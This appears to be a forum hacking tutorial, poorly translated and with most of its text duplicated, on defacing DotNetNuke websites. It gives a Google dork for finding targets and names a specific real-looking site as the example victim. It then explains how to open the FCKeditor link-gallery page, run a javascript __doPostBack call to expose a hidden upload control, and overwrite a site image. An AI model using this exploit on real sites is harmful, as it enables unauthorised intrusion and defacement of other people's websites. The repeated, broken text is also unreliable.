(DOT NET NUKE) XPLOITThe first phase of the program must be prepared are:1. Your favorite browser ..2. NotePad ..3. Carefulness (This is important) ...
Cont .. First we will look for first target ..open a browser and go to google.type the command / Dork is still fresh is as follows:CODE: SELECT ALLinurl: "/ portals / 0"
example as in the screenshot below:
his target as the above screenshot is one website from the neighbor country ..(Google.com.my emang asoy-ngeboy) ..
Go to the homepage of the website / target in atas.Lalu check every image that is located in the path:CODE: SELECT ALL/ Portal / 0 /copy and check the location / address of the image and save it in notepad ..
For example ane target guidance at:CODE: SELECT ALLhttp://www.metrodriving.com.my/
We find some files of the most easily used, for example like file2 images such as banners, etc. ..In this case, one of ane copy the url address existing images on this page:CODE: SELECT ALLhttp://www.metrodriving.com.my/Home/tabid/110/Default.aspx
if the browser Mozilla, navigate the cursor to the picture. Then right click and "copy image location". Now, comes the following address:CODE: SELECT ALLhttp://www.metrodriving.com.my/Portals/0/MDA/b.JPGCopy-Paste to notepad url2 image above into the notepad. Now the current image file name b.JPG.
Next, prepare a new image that we will use to inject / overwrite existing file. and change the name of the new image with the same name and extension.Look like the above example, the file named & berekstensi b.JPG. so files we upload pictures that will later be named the same + extension ..
Now it's time we do tahap2 to exploit. try entering the following url:CODE: SELECT ALL/ Providers / HtmlEditorProviders / fck / fcklinkgallery.aspx
Simply copy and paste the path at the top so it looks like:CODE: SELECT ALLhttp://www.WebsiteTarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
In this case, ane we'd paste the link target as follows:CODE: SELECT ALLhttp://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
then arises:
As the picture above, there are three options on the "Link-Type" ..because that would injek is a picture before him,then select the third option on the "Link-Type" her. we select a file b.JPG ..After selecting the third option is "File (A File From Your Site)", replace the URL in the bar with the script below:CODE: SELECT ALLjavascript: __doPostBack ('$ ctlURL cmdUpload','')
Then Press Enter ... ...Wewww ... After running the java script above, we will see the option to upload files like the screenshot below:
Last .. Make sure you have changed the file name + extension into ane b.JPG as has been previously mentioned above, and then upload the file is ..If you have, go to the homepage where the image location as ane done above.The result:CODE: SELECT ALL
Cont .. First we will look for first target ..open a browser and go to google.type the command / Dork is still fresh is as follows:CODE: SELECT ALLinurl: "/ portals / 0"
example as in the screenshot below:
his target as the above screenshot is one website from the neighbor country ..(Google.com.my emang asoy-ngeboy) ..
Go to the homepage of the website / target in atas.Lalu check every image that is located in the path:CODE: SELECT ALL/ Portal / 0 /copy and check the location / address of the image and save it in notepad ..
For example ane target guidance at:CODE: SELECT ALLhttp://www.metrodriving.com.my/
We find some files of the most easily used, for example like file2 images such as banners, etc. ..In this case, one of ane copy the url address existing images on this page:CODE: SELECT ALLhttp://www.metrodriving.com.my/Home/tabid/110/Default.aspx
if the browser Mozilla, navigate the cursor to the picture. Then right click and "copy image location". Now, comes the following address:CODE: SELECT ALLhttp://www.metrodriving.com.my/Portals/0/MDA/b.JPGCopy-Paste to notepad url2 image above into the notepad. Now the current image file name b.JPG.
Next, prepare a new image that we will use to inject / overwrite existing file. and change the name of the new image with the same name and extension.Look like the above example, the file named & berekstensi b.JPG. so files we upload pictures that will later be named the same + extension ..
Now it's time we do tahap2 to exploit. try entering the following url:CODE: SELECT ALL/ Providers / HtmlEditorProviders / fck / fcklinkgallery.aspx
Simply copy and paste the path at the top so it looks like:CODE: SELECT ALLhttp://www.WebsiteTarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
In this case, ane we'd paste the link target as follows:CODE: SELECT ALLhttp://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
then arises:
As the picture above, there are three options on the "Link-Type" ..because that would injek is a picture before him,then select the third option on the "Link-Type" her. we select a file b.JPG ..After selecting the third option is "File (A File From Your Site)", replace the URL in the bar with the script below:CODE: SELECT ALLjavascript: __doPostBack ('$ ctlURL cmdUpload','')
Then Press Enter ... ...Wewww ... After running the java script above, we will see the option to upload files like the screenshot below:
Last .. Make sure you have changed the file name + extension into ane b.JPG as has been previously mentioned above, and then upload the file is ..If you have, go to the homepage where the image location as ane done above.The result:CODE: SELECT ALL